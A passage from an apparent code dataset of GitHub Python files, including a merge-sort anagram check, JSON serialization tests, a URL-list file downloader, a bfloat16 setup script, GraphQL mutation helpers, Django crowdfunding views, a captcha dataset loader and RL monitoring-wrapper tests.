(\"\".join(string_one), \"\".join(string_two), False)\n else:\n return (\"\".join(string_one), \"\".join(string_two), True)\n\n\ndef merge_sort(each_string, start=0, end=None):\n if end is None:\n end = len(each_string)\n if (end - start) > 1:\n mid = (start + end) // 2\n merge_sort(each_string, start, mid)\n merge_sort(each_string, mid, end)\n merge(each_string, start, mid, end)\n return each_string\n\n\ndef merge(each_string, start, mid, end):\n left = each_string[start:mid]\n right = each_string[mid:end]\n\n left_index, right_index = 0, 0\n\n for general_index in range(start, end):\n if left_index >= len(left):\n each_string[general_index] = right[right_index]\n right_index = right_index + 1\n elif right_index >= len(right):\n each_string[general_index] = left[left_index]\n left_index = left_index + 1\n elif left[left_index] < right[right_index]:\n each_string[general_index] = left[left_index]\n left_index = left_index + 1\n else:\n each_string[general_index] = right[right_index]\n right_index = right_index + 1\n\n return each_string\n","repo_name":"ioott/BackEnd-Python-Complexidade-Recursividade-Modelos-de-Algoritmos-de-Busca_e_Ordenacao","sub_path":"challenges/challenge_anagrams.py","file_name":"challenge_anagrams.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"1186198329","text":"\"\"\"Unit tests for the j_classify package.\"\"\"\n\nimport json\nimport unittest\nimport tempfile\n\nimport j_classify\n\n\nclass TestJObject(unittest.TestCase):\n \"\"\"Test the j_object package.\"\"\"\n\n def setUp(self) -> None:\n \"\"\"Set up the test case.\"\"\"\n # Create a temp folder to store the test files\n self.temp_folder = tempfile.TemporaryDirectory()\n return super().setUp()\n\n def tearDown(self) -> None:\n \"\"\"Tear down the test case.\"\"\"\n # Delete the temp folder\n self.temp_folder.cleanup()\n return super().tearDown()\n\n def test_load_j_object(self) -> None:\n \"\"\"Test the load_j_object function.\"\"\"\n class test_class_1(j_classify.j_object):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"test_class_1\"\n self.number = 1\n self.boolean = True\n self.children: list = []\n\n class test_class_2(j_classify.j_object):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"test_class_2\"\n self.number = 2\n self.boolean = False\n self.children: list = []\n\n class test_class_3(j_classify.j_object):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"test_class_3\"\n self.number = 3\n self.boolean = True\n\n obj_1 = test_class_1()\n obj_1.name = \"obj_1\"\n obj_1.number = 2\n obj_1.boolean = False\n obj_2 = test_class_2()\n obj_2.name = \"obj_2\"\n obj_2.number = 3\n obj_2.boolean = True\n obj_1.children.append(obj_2)\n obj_3 = test_class_3()\n obj_3.name = \"obj_3\"\n obj_3.number = 4\n obj_3.boolean = False\n obj_2.children.append(obj_3)\n\n # Save the object to a file\n file_path = self.temp_folder.name + \"/test_load_j_object.json\"\n with open(file_path, \"w\") as file:\n json.dump(obj_1, file, cls=j_classify.j_object_encoder)\n\n # Load the object from the file\n with open(file_path, \"r\") as file:\n # Load a json dictionary of the file contents\n json_data = json.loads(file.read())\n loaded_obj_1 = json.loads(json.dumps(json_data), object_hook=j_classify.load_j_object)\n\n # Check the loaded object\n self.assertTrue(isinstance(loaded_obj_1, test_class_1), f\"loaded_obj_1 is not a test_class_1, it is a 
{loaded_obj_1.__class__.__name__}\")\n self.assertEqual(loaded_obj_1.name, \"obj_1\", \"loaded_obj_1.name is not 'obj_1'\")\n self.assertEqual(loaded_obj_1.number, 2, \"loaded_obj_1.number is not 2\")\n self.assertEqual(loaded_obj_1.boolean, False, \"loaded_obj_1.boolean is not False\")\n self.assertEqual(len(loaded_obj_1.children), 1, \"loaded_obj_1.children does not have 1 item\")\n self.assertTrue(isinstance(loaded_obj_1.children[0], test_class_2),\n f\"loaded_obj_1.children[0] is not a test_class_2, it is a {loaded_obj_1.children[0].__class__.__name__}\")\n self.assertEqual(loaded_obj_1.children[0].name, \"obj_2\", \"loaded_obj_1.children[0].name is not 'obj_2'\")\n self.assertEqual(loaded_obj_1.children[0].number, 3, \"loaded_obj_1.children[0].number is not 3\")\n self.assertEqual(loaded_obj_1.children[0].boolean, True, \"loaded_obj_1.children[0].boolean is not True\")\n self.assertEqual(len(loaded_obj_1.children[0].children), 1,\n \"loaded_obj_1.children[0].children does not have 1 item\")\n self.assertTrue(isinstance(loaded_obj_1.children[0].children[0], test_class_3),\n \"loaded_obj_1.children[0].children[0] is not a test_class_3\")\n self.assertEqual(loaded_obj_1.children[0].children[0].name, \"obj_3\",\n \"loaded_obj_1.children[0].children[0].name is not 'obj_3'\")\n self.assertEqual(loaded_obj_1.children[0].children[0].number, 4,\n \"loaded_obj_1.children[0].children[0].number is not 4\")\n self.assertEqual(loaded_obj_1.children[0].children[0].boolean, False,\n \"loaded_obj_1.children[0].children[0].boolean is not False\")\n\n def test_list_all_j_objects(self) -> None:\n \"\"\"Test the list_all_j_objects function.\"\"\"\n class test_class_1(j_classify.j_object):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"test_class_1\"\n self.number = 1\n self.boolean = True\n self.children: list = []\n\n class test_class_2(j_classify.j_object):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"test_class_2\"\n self.number = 2\n self.boolean = False\n self.children: list = []\n\n class test_class_3(j_classify.j_object):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"test_class_3\"\n self.number = 3\n self.boolean = True\n\n j_objects = j_classify.list_all_j_objects()\n self.assertTrue(isinstance(j_objects, dict), \"j_objects is not a dict\")\n self.assertEqual(len(j_objects), 3, \"j_objects does not have 3 items\")\n self.assertTrue(\"test_class_1\" in j_objects, \"test_class_1 is not in j_objects\")\n self.assertTrue(\"test_class_2\" in j_objects, \"test_class_2 is not in j_objects\")\n self.assertTrue(\"test_class_3\" in j_objects, \"test_class_3 is not in j_objects\")\n\n def test_j_object(self) -> None:\n \"\"\"Test the j_object class.\"\"\"\n class test_class_1(j_classify.j_object):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"test_class_1\"\n self.number = 1\n self.boolean = True\n self.children: list = []\n\n class test_class_2(j_classify.j_object):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"test_class_2\"\n self.number = 2\n self.boolean = False\n self.children: list = []\n\n class test_class_3(j_classify.j_object):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"test_class_3\"\n self.number = 3\n self.boolean = True\n\n obj_1 = test_class_1()\n obj_2 = test_class_2()\n obj_3 = test_class_3()\n\n self.assertTrue(isinstance(obj_1, j_classify.j_object), \"obj_1 is not a j_object\")\n self.assertTrue(isinstance(obj_2, j_classify.j_object), \"obj_2 is not a 
j_object\")\n self.assertTrue(isinstance(obj_3, j_classify.j_object), \"obj_3 is not a j_object\")\n\n def test_j_object_encoder(self) -> None:\n \"\"\"Test the j_object_encoder class.\"\"\"\n class test_class_1(j_classify.j_object):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"test_class_1\"\n self.number = 1\n self.boolean = True\n self.children: list = []\n\n class test_class_2(j_classify.j_object):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"test_class_2\"\n self.number = 2\n self.boolean = False\n self.children: list = []\n\n class test_class_3(j_classify.j_object):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"test_class_3\"\n self.number = 3\n self.boolean = True\n\n obj_1 = test_class_1()\n obj_2 = test_class_2()\n obj_3 = test_class_3()\n\n self.assertTrue(isinstance(obj_1, j_classify.j_object), \"obj_1 is not a j_object\")\n self.assertTrue(isinstance(obj_2, j_classify.j_object), \"obj_2 is not a j_object\")\n self.assertTrue(isinstance(obj_3, j_classify.j_object), \"obj_3 is not a j_object\")\n\n obj_1.children.append(obj_2)\n obj_2.children.append(obj_3)\n\n obj_data = json.dumps(obj_1, cls=j_classify.j_object_encoder, indent=4)\n self.assertTrue(isinstance(obj_data, str), \"obj_data is not a string\")\n print(obj_data)\n","repo_name":"gabrieljreed/jObject","sub_path":"tests/test_j_classify.py","file_name":"test_j_classify.py","file_ext":"py","file_size_in_byte":8376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"34313435421","text":"# Web to extract links from a website : https://hackertarget.com/extract-links/\n# If the error \"urllib.error.URLError: <urlopen error\n# [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed:\n# self signed certificate in certificate chain (_ssl.c:1076)>\"\n# arises, please visit : https://stackoverflow.com/questions/27835619/urllib-and-ssl-certificate-verify-failed-error\n# and install the recommended packages\n\nfrom pathlib import Path as pt\nimport urllib.request\n\n\ndef folder_creator(direction):\n # creates a folder in the given direction folder\n direction.mkdir(exist_ok=False)\n\n\ndef data_obteiner(url, cut_world):\n\n # tool to find the names of the directory and the subdiretories where the file will be store\n #\n # Args : the original url and the world starting on which (included) we will create our directories\n # (for instance if the tree is ./me/name/is/xx.pdf and the cut world is me, the class\n # will create name/is directories)\n #\n # Return :\n # direction : the tree as an array of the directories to be created\n # file_name : the name of the file to be stored\n\n url_name_clean = url.split(\"/\") # the urls as an array\n file_name = url_name_clean[len(url_name_clean) - 1].strip() # the name of the file\n\n for i in range(len(url_name_clean)):\n world = url_name_clean[i]\n\n if world == cut_world:\n direction = url_name_clean[i:len(url_name_clean) - 1] # the direction tree\n\n return direction, file_name\n\n\nclass DownloaderCreator:\n\n # Downloads the file and the creates the whole directory tree to store it\n # Args:\n # filename : the name of the .txt file where the urls are stored.\n # cut_world : the world starting on we will create our tree\n # store_directory : where the data will be stored (both directories and files\n\n def __init__(self, filename, cut_world, store_directory):\n self.filename = filename\n self.cut_world = cut_world\n self.store_directory = store_directory\n\n def 
download_save(self):\n\n        files_txt = open(self.filename, mode=\"r\", encoding=\"utf-8\")\n        # a list to store the already created files. If we try to create an existing directory an exception will arise.\n        already_created = list()\n\n        for file in files_txt:\n            array, file_name = data_obteiner(file, self.cut_world)\n\n            for el in range(len(array)):\n                if array[el] not in already_created:\n                    already_created.append(array[el])\n                    final_path = self.store_directory / \"/\".join(array[0:el + 1])\n                    folder_creator(final_path)\n\n                # download the file once the whole directory tree exists (last component reached)\n                if array[el] and el == len(array) - 1:\n                    urllib.request.urlretrieve(file.strip(), str(final_path / file_name))\n\nname_of_file = \"THE NAME OF THE .TXT INCLUDING THE URLS\"\nname_of_directory = \"WHERE THEY ARE (STARTING FROM YOUR HOME DIRECTORY)\"\n\nwhere_data_is = pt.home() / name_of_directory / name_of_file\ncutWorld = \"courses\"\npath = pt.cwd() / \"Data\"\n\nif __name__ == \"__main__\":\n    ob = DownloaderCreator(where_data_is, cutWorld, path)\n    ob.download_save()\n\n","repo_name":"ruizeneko/File-Downloader","sub_path":"Downloader.py","file_name":"Downloader.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"38434943136","text":"import os\nimport sys\nimport shutil\nfrom distutils.command.build_ext import build_ext\n\nfrom setuptools import Extension, setup\n\n# from distutils.sysconfig import customize_compiler\n\nPACKAGE_NAME='bfloat16'\n\nimport numpy as np\n\nif 'clean' in sys.argv:\n    curdir = os.path.dirname(os.path.realpath(__file__))\n    for filepath in ['build', 'dist', f'{PACKAGE_NAME}.egg-info', 'MANIFEST']:\n        if os.path.exists(filepath):\n            if os.path.isfile(filepath):\n                os.remove(filepath)\n            else:\n                shutil.rmtree(filepath)\n\n# class my_build_ext(build_ext):\n#     def build_extensions(self):\n#         customize_compiler(self.compiler)\n#         try:\n#             self.compiler.compiler_so.remove(\"-Wstrict-prototypes\")\n#         except (AttributeError, ValueError):\n#             pass\n#         build_ext.build_extensions(self)\n\n\nmodule1 = Extension(PACKAGE_NAME,\n                    sources=['bfloat16.cc'],\n                    include_dirs=[np.get_include(), \"eigen/Eigen\"],\n                    extra_compile_args=['-std=c++11'])\n\nsetup(name=PACKAGE_NAME,\n      version='1.4.0',\n      description='Numpy bfloat16 package',\n      requires=[\"numpy\"],\n      py_modules=[],\n      author='GreenWaves Technologies',\n      author_email='support@greenwaves-technologies.com',\n      url='https://github.com/GreenWaves-Technologies/bfloat16',\n      download_url = 'https://github.com/GreenWaves-Technologies/bfloat16/archive/refs/tags/1.0.tar.gz',\n      install_requires=[],\n      ext_modules=[module1])\n# ,\n# cmdclass={'build_ext': my_build_ext})\n","repo_name":"GreenWaves-Technologies/bfloat16","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"92"} +{"seq_id":"11765925189","text":"from trompace.exceptions import UnsupportedLanguageException, NotAMimeTypeException\nfrom trompace.mutations.templates import format_mutation, format_link_mutation\nfrom trompace import StringConstant, _Neo4jDate, check_required_args, filter_none_args, docstring_interpolate\nfrom trompace.constants import SUPPORTED_LANGUAGES\n\n\nMUSICRECORDING_ARGS_DOCS = \"\"\"name: The name of the MusicRecording object.\n    creator: The person, organization or service who created the thing the web resource is about.\n    contributor: 
A person, an organization, or a service responsible for contributing the MusicRecording to the web resource. This can be either a name or a base URL.\n format_: A MimeType of the format of the page describing the MusicRecording.\n source: The URL of the web resource about this MusicRecording.\n title: The title of the resource indicated by `source`\n \"\"\"\n\n\n@docstring_interpolate(\"musicrecording_args\", MUSICRECORDING_ARGS_DOCS)\ndef mutation_create_musicrecording(*, name: str = None, title: str, description: str, contributor: str, creator: str, source: str,\n format_: str, encodingformat: str = None, subject: str = None, language: str = None, date: str = None):\n \"\"\"Returns a mutation for creating a MusicRecording object.\n https://schema.org/MusicRecording\n\n Arguments:\n {musicrecording_args}\n\n Returns:\n The string for the mutation for creating the MusicRecording.\n \"\"\"\n check_required_args(title=title, contributor=contributor, creator=creator, source=source, format_=format_)\n\n if \"/\" not in format_:\n raise NotAMimeTypeException(format_)\n\n if language is not None and language not in SUPPORTED_LANGUAGES:\n raise UnsupportedLanguageException(language)\n\n args = {\n \"name\": name,\n \"title\": title,\n \"description\": description,\n \"contributor\": contributor,\n \"creator\": creator,\n \"source\": source,\n \"format\": format_,\n \"encodingFormat\": encodingformat,\n \"subject\": subject\n }\n\n if language is not None:\n args[\"language\"] = StringConstant(language.lower())\n if date is not None:\n args[\"date\"] = _Neo4jDate(date)\n\n args = filter_none_args(args)\n\n return format_mutation(\"CreateMusicRecording\", args)\n\n\n@docstring_interpolate(\"musicrecording_args\", MUSICRECORDING_ARGS_DOCS)\ndef mutation_update_musicrecording(identifier: str, *, title: str = None, contributor: str = None,\n creator: str = None, source: str = None, encodingformat: str = None,\n format_: str = None, name: str = None, language: str = None,\n description: str = None, date: str = None, subject: str = None):\n \"\"\"Returns a mutation for updating a MusicRecording object.\n https://schema.org/MusicRecording\n\n Arguments:\n identifier: The identifier of the MusicRecording in the CE to be updated\n {musicrecording_args}\n\n Returns:\n The string for the mutation for updating the MusicRecording.\n \"\"\"\n if format_ is not None and \"/\" not in format_:\n raise NotAMimeTypeException(format_)\n\n if language is not None and language not in SUPPORTED_LANGUAGES:\n raise UnsupportedLanguageException(language)\n\n args = {\n \"identifier\": identifier,\n \"title\": title,\n \"contributor\": contributor,\n \"creator\": creator,\n \"source\": source,\n \"format\": format_,\n \"name\": name,\n \"description\": description,\n \"encodingFormat\": encodingformat,\n \"subject\": subject\n }\n\n if date is not None:\n args[\"date\"] = _Neo4jDate(date)\n if language is not None:\n args[\"language\"] = StringConstant(language.lower())\n\n args = filter_none_args(args)\n\n return format_mutation(\"UpdateMusicRecording\", args)\n\n\ndef mutation_delete_musicrecording(identifier: str):\n \"\"\"Returns a mutation for deleting a MusicRecording object based on the identifier.\n https://schema.org/MusicRecording\n\n Arguments:\n identifier: The unique identifier of the MusicRecording object.\n\n Returns:\n The string for the mutation for deleting the MusicRecording object based on the identifier.\n \"\"\"\n\n return format_mutation(\"DeleteMusicRecording\", {\"identifier\": identifier})\n\n\ndef 
mutation_merge_music_recording_audio(recording_identifier, audio_identifier):\n \"\"\"Returns a mutation for adding a Audio object to a MusicRecording object.\n (https://schema.org/workExample).\n\n Args:\n recording_identifier: The identifier of a MusicRecording.\n audio_identifier: The identifier of a AudioObject linked to a MusicRecording.\n\n Returns:\n The string for the mutation for adding a Audio object to a MusicRecording object.\n \"\"\"\n return format_link_mutation(\"MergeMusicRecordingAudio\", recording_identifier, audio_identifier)\n\n\ndef mutation_remove_music_recording_audio(recording_identifier, audio_identifier):\n \"\"\"Returns a mutation for removing a Audio object to a MusicRecording object.\n (https://schema.org/workExample).\n\n Args:\n recording_identifier: The identifier of a MusicRecording.\n audio_identifier: The identifier of a AudioObject linked to a MusicRecording.\n\n Returns:\n The string for the mutation for removing a Audio object to a MusicRecording object.\n \"\"\"\n return format_link_mutation(\"RemoveMusicRecordingAudio\", recording_identifier, audio_identifier)\n","repo_name":"trompamusic/trompace-client","sub_path":"trompace/mutations/musicrecording.py","file_name":"musicrecording.py","file_ext":"py","file_size_in_byte":5545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"13008595073","text":"# persistence(999) => 4 # Because 9*9*9 = 729, 7*2*9 = 126,\n# # 1*2*6 = 12, and finally 1*2 = 2.\n# persistence(39) => 3 # Because 3*9 = 27, 2*7 = 14, 1*4=4\n# # and 4 has only one digit.\n\ndef persistence(n):\n # print(type(n))\n nn=str(n)\n # print(type(nn))\n\n if len(nn) == 1:\n print(0)\n return 0\n \n else:\n\n arr_n=[]\n arr_n.append(nn)\n # print(arr_n)\n\n for i in arr_n:\n if len(i) != 1:\n x=[]\n sum=1\n for n1 in i:\n x.append(n1)\n\n for n2 in x:\n n2=int(n2)\n sum *= n2\n\n # print(sum)\n arr_n.append(str(sum))\n # print(arr_n)\n\n \n print(len(arr_n)-1)\n return len(arr_n)-1\n\n\npersistence(39), 3\npersistence(4), 0\npersistence(25), 2\npersistence(999), 4","repo_name":"jiarmy1125/Kata","sub_path":"Persistent Bugger.py","file_name":"Persistent Bugger.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"13997476564","text":"import json\nfrom math import floor\n\nfrom django.contrib.auth import get_user\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import Http404, HttpResponse\nfrom django.shortcuts import render, get_object_or_404\nfrom django.views.decorators.http import require_http_methods\nfrom django.db.models import Sum\n\nfrom .models import \\\n Project, Donation, Category, Comment, CommentReports, ProjectImages,Tag\nfrom .forms import DonateForm, CreateForm\nfrom django.contrib import messages\nfrom django.shortcuts import redirect\nfrom collections import Counter\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom .utils import get_total_donations, get_projects_donations, get_the_most_similar_projects\n\n\n@login_required()\ndef show(request, project_id):\n project = get_object_or_404(Project, id=project_id)\n\n is_project_canceled = project.status == -1 or False\n\n if is_project_canceled and project.owner_id != request.user.id:\n raise Http404(\"project was canceled\")\n\n comments = project.comment_set.all().order_by('-created_at')\n reported_comments = [\n _.comment for _ in 
get_user(request).commentreports_set.all()\n ]\n\n tags = [_.tag for _ in project.projecttags_set.all()]\n\n related_projects = get_the_most_similar_projects(project, tags)\n if len(related_projects) < 2:\n related_projects = project.category.project_set.all()\n total_donations = get_total_donations(project)\n\n total_likes = project.review_set.filter(liked=True).count()\n liked = get_user(request).review_set.filter(liked=True)\n favourites = [_.project for _ in liked]\n is_user_reported = project.review_set.filter(user_id=request.user.id)\n is_project_saved = project.savedproject_set.filter(user_id=request.user.id)\n review = get_user(request).review_set.filter(project_id=project_id).first()\n\n is_rated = False\n if review and review.rate:\n is_rated = True\n\n donation_form = DonateForm()\n\n context = {\n 'project': project,\n 'comments': comments,\n 'tags': tags,\n 'favourites': favourites,\n 'donation_form': donation_form,\n 'total_donations': total_donations,\n 'total_likes': total_likes,\n 'is_user_reported': is_user_reported,\n 'is_project_saved': is_project_saved,\n 'related_projects': related_projects,\n 'reported_comments': reported_comments,\n 'is_project_canceled': is_project_canceled,\n 'is_rated': is_rated,\n }\n return render(request, 'projects/show.html', context)\n\n\n@require_http_methods(\"POST\")\ndef donate(request, project_id):\n project = get_object_or_404(Project, id=project_id)\n project.donation_set.create(\n user=get_user(request),\n donation=int(request.POST.get('donation'))\n )\n messages.success(request, \"Donation Added Successfully\")\n return redirect('show_project', project_id)\n\n\n@require_http_methods(\"POST\")\ndef add_comment(request, project_id):\n new_comment = request.POST.get('comment')\n current_user = get_user(request)\n current_user.comment_set.create(\n project_id=project_id,\n comment=new_comment)\n return redirect('show_project', project_id)\n\n\n@require_http_methods(\"POST\")\ndef add_reply(request):\n comment = get_object_or_404(Comment, pk=request.POST.get('comment_id'))\n reply = request.POST.get('reply')\n current_user = get_user(request)\n current_user.reply_set.create(\n reply=reply,\n comment=comment\n )\n return redirect('show_project', comment.project.id)\n\n\n@require_http_methods(\"POST\")\ndef delete_comment(request):\n comment = get_object_or_404(Comment, pk=request.POST.get('comment_id'))\n project_id = comment.project_id\n comment.delete()\n return redirect('show_project', project_id)\n\n\n@require_http_methods(\"POST\")\ndef report_comment(request):\n comment = get_object_or_404(Comment, pk=request.POST.get('comment_id'))\n CommentReports.objects.create(\n comment=comment,\n user=get_user(request),\n )\n return redirect('show_project', comment.project.id)\n\n\n@require_http_methods(\"POST\")\ndef change_favourites(request):\n project_id = request.POST.get('project')\n review = get_user(request).review_set.filter(\n project_id=project_id\n ).first()\n\n if review:\n review.liked = not review.liked\n review.save()\n else:\n review = get_user(request).review_set.create(\n project_id=project_id,\n liked=True\n )\n\n if review.liked:\n message = \"You have Successfully added\" \\\n \" this project to your favourites\"\n else:\n message = \"You have Successfully deleted\" \\\n \" this project from your favourites\"\n\n return HttpResponse(message)\n\n\n@require_http_methods(\"POST\")\ndef add_rate(request):\n project_id = request.POST.get('project')\n review, created = get_user(request).review_set.get_or_create(\n 
project_id=project_id\n )\n\n review.rate = int(request.POST.get('rate'))\n review.save()\n message = \"Thanks, for taking time to rate this project.\"\n return HttpResponse(message)\n\n\n@require_http_methods(\"POST\")\ndef report(request, project_id):\n get_user(request).review_set.get_or_create(\n reported=True,\n project_id=project_id\n )\n messages.success(request, \"Report Added Successfully\")\n return redirect('show_project', project_id)\n\n\n@require_http_methods(\"POST\")\ndef save(request, project_id):\n project = get_object_or_404(Project, id=project_id)\n if project.savedproject_set.get_or_create(user_id=request.user.id)[1]:\n messages.success(request, \"Project Saved Successfully\")\n else:\n project.savedproject_set.get(user_id=request.user.id).delete()\n messages.success(\n request,\n \"Project Removed From Your Saved Successfully\"\n )\n\n return redirect('show_project', project_id)\n\n\n@require_http_methods(\"POST\")\ndef cancel(request, project_id):\n project = get_object_or_404(Project, id=project_id)\n if get_total_donations(project)/project.target < .25:\n project.status = -1\n project.save()\n messages.success(\n request,\n \"The project has been canceled Successfully, we're sorry for that\"\n )\n\n else:\n messages.error(\n request,\n \"You can't cancel the project, \"\n \"the donations exceeded 25% of the target\"\n )\n return redirect('show_project', project_id)\n\n\ndef show_all(request):\n all_projects = Project.objects.all()\n donations, total_donations = get_projects_donations(all_projects)\n all_projects = pagination(request, all_projects)\n context = {\n \"donations\": donations,\n 'total_donations': total_donations,\n \"all_projects\": all_projects\n }\n return render(request, \"projects/all_projects.html\", context)\n\n\ndef show_create_project(request):\n categories = Category.objects.all()\n context = {'create_form': CreateForm, 'categories': categories}\n return render(request, 'projects/create_project.html', context)\n\n\ndef create(request):\n categories = Category.objects.all()\n if request.method == 'POST':\n create_form = CreateForm(request.POST, request.FILES)\n project_images = request.FILES.getlist('images')\n context = {'create_form': create_form, 'categories': categories}\n if create_form.is_valid():\n project = Project(\n title=create_form.cleaned_data['title'],\n details=create_form.cleaned_data['details'],\n target=create_form.cleaned_data['target'],\n cover=request.FILES['cover'],\n category_id=request.POST['categ'],\n start_date=create_form.cleaned_data['start_date'],\n end_date=create_form.cleaned_data['end_date'],\n owner_id=request.user.id\n )\n project.save()\n tags = create_form.cleaned_data['tags']\n tags = tags.split(',')\n for tag in tags:\n obj, created = Tag.objects.get_or_create(name=tag)\n project.projecttags_set.create(tag=obj)\n for image in project_images:\n photo = ProjectImages(project=project, image=image)\n photo.save()\n messages.success(request, 'Project Created Successfully')\n return redirect('show_project', project.id)\n else:\n return render(request, 'projects/create_project.html', context)\n\n\ndef projects_list(request):\n projects = get_user(request).project_set.all()\n context = get_context(request, projects)\n return render(request, 'projects/project_list.html', context)\n\n\ndef donate_list(request):\n my_donations = get_user(request).donation_set.order_by('-donated_at')\n projects = [_.project for _ in my_donations]\n context = get_context(request, projects)\n context['my_donations'] = my_donations\n 
return render(request, 'projects/donation_list.html', context)\n\n\ndef saved_projects(request):\n saved = get_user(request).savedproject_set.all()\n projects = [_.project for _ in saved]\n context = get_context(request, projects)\n return render(request, 'projects/project_list.html', context)\n\n\ndef pagination(request, projects):\n page = request.GET.get('page', 1)\n paginator = Paginator(projects, 18)\n try:\n projects = paginator.page(page)\n except PageNotAnInteger:\n projects = paginator.page(1)\n except EmptyPage:\n projects = paginator.page(paginator.num_pages)\n return projects\n\n\ndef get_context(request, projects):\n donations, total_donations = get_projects_donations(projects)\n projects = pagination(request, projects)\n context = {\n \"projects\": projects,\n \"donations\": donations,\n 'total_donations': total_donations\n }\n return context\n","repo_name":"Elshafeay/crowd-funding","sub_path":"projects/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"74340807018","text":"import re\nimport torch\nfrom torch.utils.data import Dataset\nimport os\nfrom PIL import Image\nfrom torchvision import transforms\n\n\n\nclass MyDataset(Dataset):\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Resize((40, 100)),\n transforms.Grayscale()\n ])\n\n def __init__(self, image_path):\n image_path = 'Verification_code_identification\\\\source\\\\train_img'\n super(MyDataset, self).__init__()\n self.image_path = [os.path.join(image_path, file_name) for file_name in os.listdir(image_path)]\n\n def __len__(self):\n return len(self.image_path)\n\n def __getitem__(self, item):\n image = Image.open(self.image_path[item])\n image = MyDataset.transform(image)\n image_name = self.image_path[item].split('/')[-1]\n code = image_name.split('_')[0]\n code = MyDataset.encode(code) # 转换为展平的单热点编码tensor\n return image, code\n\n @staticmethod\n def encode(code):\n \"\"\"\n :param code:验证码\n :return: 展平后的单热点编码Tensor\n 使用单热点编码,便于神经网络输出\n \"\"\"\n all_code = list('0123456789')\n code = ''.join(re.findall(r'\\d', code))\n encoded = torch.zeros(len(code), len(all_code), dtype=torch.int)\n for i in range(len(code)):\n encoded[i, all_code.index(code[i])] = int(1)\n encoded = torch.flatten(encoded)\n return encoded\n\n @staticmethod\n def decode(code_tensor):\n all_code = list('0123456789')\n f = code_tensor.view(4, 10)\n result = []\n for row in f:\n result.append(all_code[torch.argmax(row, dim=0)])\n result = ''.join(result)\n return result\n\n","repo_name":"asunashama/Smart_inlay","sub_path":"source/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"40984941908","text":"\"\"\" Contains tests for the observation logging wrapper. 
\"\"\"\n\nimport numpy as np\n\nfrom maze.core.log_events.monitoring_events import ObservationEvents, RewardEvents, ActionEvents\nfrom maze.core.wrappers.log_stats_wrapper import LogStatsWrapper\nfrom maze.core.wrappers.monitoring_wrapper import MazeEnvMonitoringWrapper\nfrom maze.test.shared_test_utils.dummy_env.dummy_core_env import DummyCoreEnvironment\nfrom maze.test.shared_test_utils.dummy_env.dummy_maze_env import DummyEnvironment\nfrom maze.test.shared_test_utils.dummy_env.dummy_struct_env import DummyStructuredEnvironment\nfrom maze.test.shared_test_utils.dummy_env.space_interfaces.action_conversion.dict import DictActionConversion\nfrom maze.test.shared_test_utils.dummy_env.space_interfaces.observation_conversion.dict import ObservationConversion\nfrom maze.test.shared_test_utils.helper_functions import build_dummy_maze_env\n\n\ndef build_dummy_structured_environment() -> DummyStructuredEnvironment:\n \"\"\"\n Instantiates the DummyStructuredEnvironment.\n\n :return: Instance of a DummyStructuredEnvironment\n \"\"\"\n\n observation_conversion = ObservationConversion()\n\n maze_env = DummyEnvironment(\n core_env=DummyCoreEnvironment(observation_conversion.space()),\n action_conversion=[DictActionConversion()],\n observation_conversion=[observation_conversion]\n )\n\n return DummyStructuredEnvironment(maze_env=maze_env)\n\n\ndef test_observation_monitoring():\n \"\"\" Observation logging unit test \"\"\"\n\n # instantiate env\n env = build_dummy_maze_env()\n\n env = MazeEnvMonitoringWrapper.wrap(env, observation_logging=True, action_logging=False, reward_logging=False)\n env = LogStatsWrapper.wrap(env) # for accessing events from previous steps\n env.reset()\n\n # test application of wrapper\n for ii in range(3):\n # Observation will get reported in the next step (when the agent is actually acting on it)\n obs = env.step(env.action_space.sample())[0]\n\n observation_events = env.get_last_step_events(query=[ObservationEvents.observation_original,\n ObservationEvents.observation_processed])\n assert len(observation_events) == 4\n for event in observation_events:\n assert issubclass(event.interface_class, ObservationEvents)\n obs_name = event.attributes['name']\n assert obs_name in ['observation_0', 'observation_1']\n if ii > 0:\n assert np.allclose(np.asarray(obs[obs_name]), np.asarray(event.attributes['value']))\n\n\ndef test_reward_monitoring():\n \"\"\" Reward logging unit test \"\"\"\n\n # instantiate env\n env = build_dummy_maze_env()\n\n env = MazeEnvMonitoringWrapper.wrap(env, observation_logging=False, action_logging=False, reward_logging=True)\n env = LogStatsWrapper.wrap(env) # for accessing events from previous steps\n env.reset()\n env.step(env.action_space.sample())\n\n # test application of wrapper\n for ii in range(2):\n env.step(env.action_space.sample())\n\n reward_events = env.get_last_step_events(query=[RewardEvents.reward_original,\n RewardEvents.reward_processed])\n\n assert len(reward_events) == 2\n for event in reward_events:\n assert issubclass(event.interface_class, RewardEvents)\n assert event.attributes['value'] == 10\n assert event.interface_method in 